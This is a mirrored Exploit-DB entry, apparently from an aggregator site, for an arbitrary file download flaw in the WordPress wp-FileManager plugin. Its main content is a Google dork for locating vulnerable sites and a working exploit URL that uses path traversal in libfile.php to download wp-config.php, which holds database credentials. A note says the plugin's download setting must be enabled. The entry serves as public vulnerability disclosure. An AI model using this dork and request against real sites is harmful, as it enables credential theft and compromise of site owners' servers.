WordPress Plugin wp-FileManager – Arbitrary File Download

Exploit Database
9 阅读

作者： ByEge

日期： 2013-05-14
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/25440/

Title: WordPress wp-FileManager Local File Download Vulnerability
Author: ByEge
Download: http://wordpress.org/extend/plugins/wp-filemanager/
Test Platform: Linux
Images: http://j1305.hizliresim.com/19/f/n0xxf.jpg
Vuln. Plat.: Web Application



Google Dorks: inurl:wp-content/plugins/wp-filemanager/
Test : http://server/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download

# Exploit-DB Note:
# In order for this to work, the "Allow Download" setting must be checked in the FileManager's settings.

last Exploits
WordPress Plugin wp-FileManager – Arbitrary File Download的更多信息

Getsimple CMS 3.3.10 – Arbitrary File Upload：
McAfee ePO 4.6.6 – Multiple Vulnerabilities：
Joomla! Component SermonSpeaker – SQL Injection：
INFOR EAM 11.0 Build 201410 – ‘filtervalue’ SQL Injection：
ICLowBidAuction 3.3 – SQL Injection：
Stackposts Social Marketing Tool v1.0 – SQL Injection：
Webtateas 2.0 – Arbitrary File Read：
WordPress Plugin wp-topbar 4.02 – Multiple Vulnerabilities：